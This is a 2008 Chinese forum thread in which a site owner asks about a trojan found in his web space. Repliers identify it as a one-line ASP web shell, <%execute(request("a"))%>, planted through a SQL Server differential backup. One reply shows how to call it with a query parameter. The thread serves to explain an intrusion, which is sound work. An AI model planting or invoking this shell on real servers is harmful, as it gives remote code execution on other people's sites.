请问这种木马代码是如何加密的,用啥能解密

XUZIFENG 2008-04-08 11:15:24
有人传木马上我空间,有谁能帮我看下这是如何加密的
我想看下,代码内容,看看这代码是干吗的

头1行:
TAPE??咊,^a <Microsoft SQL ServerSPAD^LSFMB 8曀`SSETd?za <

中间一段
?/8
/?
{@T?8/?ΥQ?
/?8
/?
?T?8/?ΥQ?/?8/?ΥQ?B/?8
/?
{S?8/?ΥQ/?8
/?T?4/?ΥQFt/??D
...全文
108 点赞 收藏 8
写回复
8 条回复
切换为时间正序
当前发帖距今超过3年,不再开放新的回复
发表回复
gingerkang 2008-04-09
[Quote=引用 6 楼 chinmo 的回复:]
这个兄弟说得不错

看来也是很熟悉的啊
[/Quote]

对此以前就有所了解,在baidu,google上搜索也会有很多相关的文章介绍.
问题出来web服务和sqlserver服务共用一台服务器,而且sqlserver分配的帐号权限给得太大,dbo就已经具备备份数据库的权限,一个虚拟主机用到了该权限的帐号,只要该站点存在注入,这台服务器的所有站点都是鱼肉了.
回复
Atai-Lu 2008-04-09
看不懂,哎~
回复
[Quote=引用 2 楼 gingerkang 的回复:]
<%execute(request("a"))%>
一句话木马,没有加什么密,明显是用sqlserver差异备份得到的shell
[/Quote]

这个兄弟说得不错

看来也是很熟悉的啊
回复
liyong888_8 2008-04-09
jf
回复
hookee 2008-04-09
主要是生成的asp文件注入了<%execute(request("a"))%>,前后的字符都没有关系
访问的时候可以 1.asp?a=asp代码 的方式
比如 1.asp?a=response.write(server.mappath("/")):response.end
回复
black__art 2008-04-09
呵呵,JF
回复
gingerkang 2008-04-08
<%execute(request("a"))%>
一句话木马,没有加什么密,明显是用sqlserver差异备份得到的shell
回复
XUZIFENG 2008-04-08
对了 中间还有这类的

P
^/?/?睶(/?�TT? <%execute(request("a"))%>爆鹣`8?`8?`鹣`鹣`P爆\爆o5J4

c/?#a`P�"睶3築栳@tAllocate RootD/?
"睶?(/??`/D/?
"睶?c/??pX/?

我运行这些代码出错 说

Microsoft VBScript 运行时错误 (0x800A000D)
类型不匹配: 'execute'
/1.asp, 第 33 行


回复
相关推荐
发帖
ASP
创建于2007-09-28

2.8w+

社区成员

ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
申请成为版主
帖子事件
创建了帖子
2008-04-08 11:15
社区公告
暂无公告